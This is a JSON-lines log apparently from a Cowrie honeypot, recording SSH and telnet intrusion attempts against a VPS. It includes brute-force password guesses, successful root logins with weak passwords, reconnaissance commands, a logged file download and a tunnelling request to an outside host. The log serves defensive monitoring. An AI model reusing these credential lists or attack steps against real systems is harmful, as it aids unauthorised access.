{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.920193Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.920744Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.921291Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.921943Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T08:19:09.922413Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T08:19:10.083494Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:10.084408Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:10.085528Z","src_ip":"212.227.125.160","session":"783b1ee2626b"}
{"eventid":"cowrie.login.success","username":"root","password":"Mari","message":"login attempt [root/Mari] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:19:14.350555Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:19:16.515439Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T08:19:16.516154Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.session.closed","duration":12.647034168243408,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:16.624389Z","src_ip":"212.227.235.229","session":"62a56006988b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49790,"dst_ip":"1.2.3.4","dst_port":23,"session":"22bbbbb9732a","protocol":"telnet","message":"New connection: 212.227.235.229:49790 (1.2.3.4:23) [session: 22bbbbb9732a]","sensor":"my-vps","timestamp":"2025-08-31T08:19:16.868171Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:17.500168Z","src_ip":"212.227.125.160","session":"dc27f3ba030e"}
{"eventid":"cowrie.session.closed","duration":180.57491970062256,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:17.507225Z","src_ip":"212.227.125.160","session":"dc27f3ba030e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:17.543012Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:17.544248Z","src_ip":"212.227.125.160","session":"78c3dbd487b1"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":34138,"dst_ip":"1.2.3.4","dst_port":22,"session":"78574520ef5f","protocol":"ssh","message":"New connection: 201.148.180.50:34138 (1.2.3.4:22) [session: 78574520ef5f]","sensor":"my-vps","timestamp":"2025-08-31T08:19:24.466518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:19:25.602039Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:19:25.602997Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.session.closed","duration":12.836441993713379,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:29.704530Z","src_ip":"212.227.235.229","session":"22bbbbb9732a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50107,"dst_ip":"1.2.3.4","dst_port":23,"session":"da2a807307b0","protocol":"telnet","message":"New connection: 212.227.235.229:50107 (1.2.3.4:23) [session: da2a807307b0]","sensor":"my-vps","timestamp":"2025-08-31T08:19:29.968092Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Mari","message":"login attempt [root/Mari] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:19:33.866060Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:19:36.226804Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T08:19:36.227556Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:37.734722Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:37.735989Z","src_ip":"201.148.180.50","session":"78574520ef5f"}
{"eventid":"cowrie.session.closed","duration":12.86627459526062,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:42.834304Z","src_ip":"212.227.235.229","session":"da2a807307b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50403,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef15a224261c","protocol":"telnet","message":"New connection: 212.227.235.229:50403 (1.2.3.4:23) [session: ef15a224261c]","sensor":"my-vps","timestamp":"2025-08-31T08:19:43.093995Z"}
{"eventid":"cowrie.session.closed","duration":12.471983432769775,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:19:55.565879Z","src_ip":"212.227.235.229","session":"ef15a224261c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50647,"dst_ip":"1.2.3.4","dst_port":23,"session":"08a5ac307daf","protocol":"telnet","message":"New connection: 212.227.235.229:50647 (1.2.3.4:23) [session: 08a5ac307daf]","sensor":"my-vps","timestamp":"2025-08-31T08:19:55.939611Z"}
{"eventid":"cowrie.session.closed","duration":12.728942394256592,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:20:08.668486Z","src_ip":"212.227.235.229","session":"08a5ac307daf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50945,"dst_ip":"1.2.3.4","dst_port":23,"session":"87efa1926adf","protocol":"telnet","message":"New connection: 212.227.235.229:50945 (1.2.3.4:23) [session: 87efa1926adf]","sensor":"my-vps","timestamp":"2025-08-31T08:20:09.001079Z"}
{"eventid":"cowrie.session.closed","duration":12.828718662261963,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:20:21.829732Z","src_ip":"212.227.235.229","session":"87efa1926adf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51213,"dst_ip":"1.2.3.4","dst_port":23,"session":"c8868c9be906","protocol":"telnet","message":"New connection: 212.227.235.229:51213 (1.2.3.4:23) [session: c8868c9be906]","sensor":"my-vps","timestamp":"2025-08-31T08:20:22.010313Z"}
{"eventid":"cowrie.session.closed","duration":12.663994073867798,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:20:34.674242Z","src_ip":"212.227.235.229","session":"c8868c9be906"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51478,"dst_ip":"1.2.3.4","dst_port":23,"session":"f122fef45d83","protocol":"telnet","message":"New connection: 212.227.235.229:51478 (1.2.3.4:23) [session: f122fef45d83]","sensor":"my-vps","timestamp":"2025-08-31T08:20:34.936122Z"}
{"eventid":"cowrie.session.closed","duration":12.684961557388306,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:20:47.621013Z","src_ip":"212.227.235.229","session":"f122fef45d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51754,"dst_ip":"1.2.3.4","dst_port":23,"session":"a856feb8a3a8","protocol":"telnet","message":"New connection: 212.227.235.229:51754 (1.2.3.4:23) [session: a856feb8a3a8]","sensor":"my-vps","timestamp":"2025-08-31T08:20:47.850001Z"}
{"eventid":"cowrie.session.closed","duration":12.624844551086426,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:00.473876Z","src_ip":"212.227.235.229","session":"a856feb8a3a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52036,"dst_ip":"1.2.3.4","dst_port":23,"session":"652af4c352f5","protocol":"telnet","message":"New connection: 212.227.235.229:52036 (1.2.3.4:23) [session: 652af4c352f5]","sensor":"my-vps","timestamp":"2025-08-31T08:21:01.818049Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63626,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c854555eb28","protocol":"ssh","message":"New connection: 212.227.125.160:63626 (1.2.3.4:22) [session: 0c854555eb28]","sensor":"my-vps","timestamp":"2025-08-31T08:21:03.407434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:21:03.408387Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:21:03.492362Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne","message":"login attempt [julianne/julianne] failed","sensor":"my-vps","timestamp":"2025-08-31T08:21:04.092085Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne1","message":"login attempt [julianne/julianne1] failed","sensor":"my-vps","timestamp":"2025-08-31T08:21:05.179062Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne123","message":"login attempt [julianne/julianne123] failed","sensor":"my-vps","timestamp":"2025-08-31T08:21:06.264899Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne1234","message":"login attempt [julianne/julianne1234] failed","sensor":"my-vps","timestamp":"2025-08-31T08:21:07.350866Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne12345","message":"login attempt [julianne/julianne12345] failed","sensor":"my-vps","timestamp":"2025-08-31T08:21:08.437340Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:09.523966Z","src_ip":"212.227.125.160","session":"0c854555eb28"}
{"eventid":"cowrie.session.closed","duration":12.70573377609253,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:14.523708Z","src_ip":"212.227.235.229","session":"652af4c352f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52352,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fb7322154ea","protocol":"telnet","message":"New connection: 212.227.235.229:52352 (1.2.3.4:23) [session: 9fb7322154ea]","sensor":"my-vps","timestamp":"2025-08-31T08:21:14.779240Z"}
{"eventid":"cowrie.session.closed","duration":12.727250576019287,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:27.506135Z","src_ip":"212.227.235.229","session":"9fb7322154ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52647,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3cbf2a37720","protocol":"telnet","message":"New connection: 212.227.235.229:52647 (1.2.3.4:23) [session: f3cbf2a37720]","sensor":"my-vps","timestamp":"2025-08-31T08:21:27.734336Z"}
{"eventid":"cowrie.session.closed","duration":12.760323524475098,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:40.494589Z","src_ip":"212.227.235.229","session":"f3cbf2a37720"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52919,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec49a7f4cd81","protocol":"telnet","message":"New connection: 212.227.235.229:52919 (1.2.3.4:23) [session: ec49a7f4cd81]","sensor":"my-vps","timestamp":"2025-08-31T08:21:40.751216Z"}
{"eventid":"cowrie.session.closed","duration":12.823222875595093,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:21:53.574371Z","src_ip":"212.227.235.229","session":"ec49a7f4cd81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53219,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b94ce0b3664","protocol":"telnet","message":"New connection: 212.227.235.229:53219 (1.2.3.4:23) [session: 2b94ce0b3664]","sensor":"my-vps","timestamp":"2025-08-31T08:21:53.848497Z"}
{"eventid":"cowrie.session.closed","duration":12.74495792388916,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:06.593385Z","src_ip":"212.227.235.229","session":"2b94ce0b3664"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53528,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3fa34b50cdf","protocol":"telnet","message":"New connection: 212.227.235.229:53528 (1.2.3.4:23) [session: e3fa34b50cdf]","sensor":"my-vps","timestamp":"2025-08-31T08:22:06.859526Z"}
{"eventid":"cowrie.session.closed","duration":12.752319812774658,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:19.611771Z","src_ip":"212.227.235.229","session":"e3fa34b50cdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53822,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f6a68a7d347","protocol":"telnet","message":"New connection: 212.227.235.229:53822 (1.2.3.4:23) [session: 6f6a68a7d347]","sensor":"my-vps","timestamp":"2025-08-31T08:22:19.883408Z"}
{"eventid":"cowrie.session.closed","duration":12.59125828742981,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:32.474565Z","src_ip":"212.227.235.229","session":"6f6a68a7d347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54094,"dst_ip":"1.2.3.4","dst_port":23,"session":"42a8ae9a6efc","protocol":"telnet","message":"New connection: 212.227.235.229:54094 (1.2.3.4:23) [session: 42a8ae9a6efc]","sensor":"my-vps","timestamp":"2025-08-31T08:22:32.738409Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6453,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c11e0fb7e3d","protocol":"ssh","message":"New connection: 212.227.235.229:6453 (1.2.3.4:22) [session: 3c11e0fb7e3d]","sensor":"my-vps","timestamp":"2025-08-31T08:22:43.376911Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:43.377976Z","src_ip":"212.227.235.229","session":"3c11e0fb7e3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6813,"dst_ip":"1.2.3.4","dst_port":22,"session":"c24332d0bc35","protocol":"ssh","message":"New connection: 212.227.235.229:6813 (1.2.3.4:22) [session: c24332d0bc35]","sensor":"my-vps","timestamp":"2025-08-31T08:22:43.477968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:22:43.478860Z","src_ip":"212.227.235.229","session":"c24332d0bc35"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T08:22:43.611180Z","src_ip":"212.227.235.229","session":"c24332d0bc35"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:22:44.004337Z","src_ip":"212.227.235.229","session":"c24332d0bc35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T08:22:44.136040Z","session":"c24332d0bc35"}
{"eventid":"cowrie.session.closed","duration":12.739444017410278,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:45.477773Z","src_ip":"212.227.235.229","session":"42a8ae9a6efc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54391,"dst_ip":"1.2.3.4","dst_port":23,"session":"037191ad1f91","protocol":"telnet","message":"New connection: 212.227.235.229:54391 (1.2.3.4:23) [session: 037191ad1f91]","sensor":"my-vps","timestamp":"2025-08-31T08:22:45.692421Z"}
{"eventid":"cowrie.session.closed","duration":12.830719709396362,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:22:58.523065Z","src_ip":"212.227.235.229","session":"037191ad1f91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50569,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8625fbda0d7","protocol":"telnet","message":"New connection: 212.227.235.229:50569 (1.2.3.4:23) [session: a8625fbda0d7]","sensor":"my-vps","timestamp":"2025-08-31T08:23:45.073673Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:23:53.478596Z","src_ip":"212.227.235.229","session":"c24332d0bc35"}
{"eventid":"cowrie.session.closed","duration":13.786477088928223,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:23:58.860078Z","src_ip":"212.227.235.229","session":"a8625fbda0d7"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.83.32","src_port":44400,"dst_ip":"1.2.3.4","dst_port":22,"session":"3183d682ce10","protocol":"ssh","message":"New connection: 203.195.83.32:44400 (1.2.3.4:22) [session: 3183d682ce10]","sensor":"my-vps","timestamp":"2025-08-31T08:24:32.429895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:24:32.431875Z","src_ip":"203.195.83.32","session":"3183d682ce10"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T08:24:32.650583Z","src_ip":"203.195.83.32","session":"3183d682ce10"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:24:40.430540Z","src_ip":"203.195.83.32","session":"3183d682ce10"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60180,"dst_ip":"1.2.3.4","dst_port":22,"session":"857698287cc9","protocol":"ssh","message":"New connection: 217.72.205.35:60180 (1.2.3.4:22) [session: 857698287cc9]","sensor":"my-vps","timestamp":"2025-08-31T08:24:44.309530Z"}
